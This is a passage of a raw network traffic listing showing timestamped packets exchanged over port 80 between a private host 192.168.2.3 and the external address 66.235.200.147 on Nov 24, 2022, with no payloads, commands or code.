Nov 24, 2022 12:20:03.410152912 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.410180092 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.410197020 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.410204887 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.410223007 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.410231113 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.410249949 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.410257101 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.410269976 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.410281897 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.410295963 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.410306931 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.410322905 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.410331011 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.410345078 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.410356045 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.410367966 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.410382032 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.410393953 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.410406113 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.410418987 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.410429955 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.410443068 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.410456896 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.410470009 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.410481930 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.410494089 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.410506964 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.410517931 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.410533905 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.410556078 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.410558939 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.410583973 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.410584927 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.410599947 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.410609961 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.410624027 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.410634995 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.410649061 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.410661936 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.410672903 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.410686970 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.410701036 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.410712004 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.410722971 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.410737991 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.410751104 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.410765886 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.410774946 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.410793066 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.410806894 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.410820961 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.410831928 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.410845995 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.410857916 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.410871029 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.410911083 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.410938978 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.410964966 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.410979986 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.410979986 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.410990953 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.410994053 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.411017895 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.411037922 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.411042929 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.411066055 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.411068916 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.411089897 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.411094904 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.411108971 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.411120892 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.411132097 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.411149025 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.411156893 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.411176920 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.411186934 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.411202908 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.411214113 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.411230087 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.411242008 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.411254883 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.411267996 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.411281109 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.411292076 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.411305904 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.411315918 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.411330938 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.411345959 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.411355972 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.411382914 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.411408901 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.411432981 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.411441088 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.411441088 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.411458969 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.411459923 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.411484957 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.411488056 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.411513090 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.411518097 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.411535025 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.411541939 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.411567926 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.411569118 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.411600113 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.411607981 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.411627054 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.411627054 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.411654949 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.411674976 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.411694050 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.411714077 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.411732912 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.411758900 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.411767006 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.411784887 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.411791086 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.411812067 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.411818027 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.411838055 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.411854982 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.411863089 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.411870956 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.411890030 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.411904097 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.411917925 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.411931038 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.411948919 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.411967993 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.411973953 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.412000895 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.412002087 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.412015915 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.412028074 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.412044048 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.412055969 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.412066936 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.412081003 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.412096024 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.412107944 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.412118912 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.412134886 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.412144899 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.412159920 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.412178993 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.412187099 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.412204981 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.412211895 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.412237883 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.412246943 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.412262917 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.412269115 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.412288904 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.412292004 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.412307978 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.412314892 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.412328005 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.412339926 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.412365913 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.412368059 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.412390947 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.412391901 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.412410975 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.412415981 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.412427902 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.412441015 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.412456036 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.412467003 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.412492037 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.412492037 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.412514925 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.412518978 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.412534952 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.412544012 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.412555933 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.412570000 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.412585020 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.412595034 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.412606955 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.412620068 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.412632942 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.412645102 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.412686110 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.412692070 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.412718058 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.412744999 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.412760973 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.412771940 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.412784100 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.412797928 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.412813902 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.412823915 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.412842035 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.412848949 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.412863016 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.412882090 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.412892103 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.412909031 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.412919998 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.412940979 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.412952900 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.412966013 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.412977934 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.412992001 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.413007975 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.413017035 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.413034916 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.413042068 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.413053989 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.413068056 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.413083076 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.413091898 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.413105965 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.413120985 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.413131952 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.413151026 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.413161039 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.413175106 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.413194895 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.413214922 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.413233042 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.413258076 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.413280964 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.413283110 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.413309097 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.413311005 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.413331985 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.413332939 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.413355112 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.413357973 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.413383961 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.413387060 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.413407087 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.413408995 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.413424015 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.413434982 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.413446903 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.413460970 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.413471937 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.413486958 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.413512945 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.413527012 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.413539886 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.413551092 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.413566113 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.413577080 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.413592100 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.413614988 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.413616896 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.413640022 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.413641930 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.413660049 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.413666964 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.413691998 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.413692951 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.413710117 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.413718939 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.413731098 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.413743973 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.413758039 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.413769007 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.413780928 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.413794041 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.413808107 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.413820028 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.413836002 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.413846016 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.413866043 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.413871050 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.413881063 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.413896084 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.413923979 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.413940907 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.413949013 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.413975000 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.413975000 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.413997889 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.414011002 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.414022923 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.414037943 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.414050102 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.414082050 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.414086103 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.414098978 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.414122105 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.414124012 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.414158106 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.414184093 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.414208889 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.414233923 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.414241076 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.414261103 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.414272070 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.414287090 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.414304972 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.414315939 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.414338112 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.414347887 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.414370060 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.414378881 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.414408922 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.414433002 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.414443970 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.414449930 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.414475918 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.414484024 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.414508104 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.414541960 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.414577961 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.414613962 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.414648056 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.414683104 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.414683104 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.414683104 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.414683104 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.414683104 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.414700985 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.414719105 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.414747000 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.414752960 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.414764881 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.414787054 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.414813995 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.414844036 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.414891005 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.414925098 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.414954901 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.414993048 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.415008068 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.415018082 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.415019035 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.415054083 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.415056944 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.415086985 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.415088892 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.415116072 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.415128946 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.415146112 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.415163994 CET	49710	80	192.168.2.3	66.235.200.147
